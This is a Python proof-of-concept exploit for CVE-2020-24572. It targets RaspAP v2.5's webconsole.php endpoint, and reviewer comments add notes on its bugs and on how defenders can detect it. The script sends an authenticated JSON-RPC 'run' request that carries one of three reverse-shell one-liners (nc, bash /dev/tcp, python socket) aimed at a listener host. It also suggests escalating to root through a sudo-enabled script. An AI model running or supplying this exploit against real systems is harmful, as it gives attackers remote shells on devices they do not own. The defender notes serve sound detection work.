#/usr/bin/python3
# NOTE(review): the line above lacks the "!" of a shebang, so the file must be
# started as "python3 rasp_pwn.py ..." rather than executed directly.
#####################################################
### Proof of Concept for CVE-2020-24572 ###
### (Authenticated) Remote Code Execution ###
### via Webconsole.php in ###
### RaspAP v2.5 ###
### github.com/billz/raspap-webgui ###
### github.com/nickola/web-console ###
#####################################################
### Re-Written by: gerberop Date:03/31/2021 ###
#####################################################
### Credit: lunchb0x - Disc. Date: 08/24/2020 ###
#####################################################
### github.com/gerberop/CVE-2020-24572 ###
#####################################################
#
# Flat script, no functions. What it does, as visible below:
#   1. reads six positional arguments (target, port, listener address/port,
#      the RaspAP admin password and a payload selector);
#   2. picks one of three reverse-shell one-liners;
#   3. sends a single JSON-RPC 2.0 "run" request, authenticated with HTTP
#      Basic auth as user "admin", to /includes/webconsole.php over plain HTTP.
#
# Defender notes (grounded in the request built below):
#   - Web-server access logs: a POST to /includes/webconsole.php whose body
#     carries "jsonrpc": "2.0" and "method": "run" is the signature of this
#     PoC; the bundled web-console endpoint is otherwise rarely called.
#   - Egress: immediately after that request the device opens an outbound TCP
#     connection from the RaspAP host to listener_ip:listener_port.
#   - The request is authenticated, so a weak or default RaspAP admin password
#     is the precondition; the admin UI should not be reachable from untrusted
#     networks, and the web-console endpoint should be removed or blocked on
#     installs that do not need it. Whether later RaspAP releases changed this
#     endpoint is not stated on this page - confirm against the upstream repo.
#   - Credentials travel in cleartext because the URL is http://.
import os
import sys
import requests          # third-party: HTTP client
from termcolor import colored  # third-party: coloured console output only

# Usage check: six user arguments plus argv[0].
if len(sys.argv) != 7:
    print("-------------------------------------------------------------------------------------------------")
    print("USAGE: rasp_pwn.py [target_ip] [port] [attacker_ip] [attacker_port] [RaspAP_admin_pass] [payload]")
    print("-------------------------------------------------------------------------------------------------")
    print("Payload options: \n1. nc reverse shell\n2. bash reverse shell\n3. python reverse shell")
    print("-------------------------------------------------------------------------------------------------")
    exit(1)

# Positional arguments; nothing is validated (port is kept as a string and
# interpolated into the URL as-is).
target = sys.argv[1]
port = sys.argv[2]
listener_ip = sys.argv[3]
listener_port = sys.argv[4]
raspap_user = "admin"      # hard-coded: only the "admin" account is tried
raspap_pass = sys.argv[5]
payload = sys.argv[6]

# Payload selection. NOTE(review): there is no else branch, so any value other
# than '1', '2' or '3' leaves `cmd` unbound and the script dies with a
# NameError when json_req_1 is built, not with a usage message.
if payload == '1':
    cmd = f"nc -e /bin/bash {listener_ip} {listener_port}"
elif payload == '2':
    cmd = f"/bin/bash -c 'bash -i >& /dev/tcp/{listener_ip}/{listener_port} 0>&1'"
elif payload == '3':
    cmd = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_ip}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"

# A (user, password) tuple on session.auth is HTTP Basic auth in requests;
# it is attached to every request made through this session.
session = requests.Session()
session.auth = (raspap_user, raspap_pass)

# JSON-RPC 2.0 body for the web-console "run" method. The "NO_LOGIN" token and
# the empty user/hostname/path map are passed through verbatim; what the
# endpoint does with them is not shown here - presumably they mirror the
# web-console client's own request shape (confirm against nickola/web-console).
json_req_1 = {
    "jsonrpc": "2.0",
    "method": "run",
    "params": ["NO_LOGIN", {"user": "", "hostname": "", "path": ""}, f"{cmd}"],
    "id": 6
}

print(colored("[!]", 'green') + f" Using Reverse Shell: {cmd}")
print(colored("[!]", 'yellow') + " Sending activation request - Make sure your listener is running . . .")
input(colored("[>>>]", 'green')+" Press ENTER to continue . . .")
# `stty echo` is run twice (here and below) via the shell; the intent is not
# stated - presumably to restore terminal echo after input()/a spawned shell.
os.system("stty echo")
print(colored("\n[!]", 'green') + " You should have a shell :)")
print(colored("\n[!]", 'red') + " Remember to check sudo -l to see if you can get root through /etc/raspap/lighttpd/configport.sh")
os.system("stty echo")

# The single network action of the script. NOTE(review): the response `r` is
# never inspected - a 401 (wrong password), a 404 (endpoint removed) or a
# connection error is not reported; the "Done." line prints regardless, and a
# requests exception would surface as an uncaught traceback. No timeout is set,
# so a server that holds the connection open blocks the script indefinitely.
r = session.post("http://%s:%s/includes/webconsole.php"%(target,port), json=json_req_1)
print(colored("[*]", 'green') + " Done.")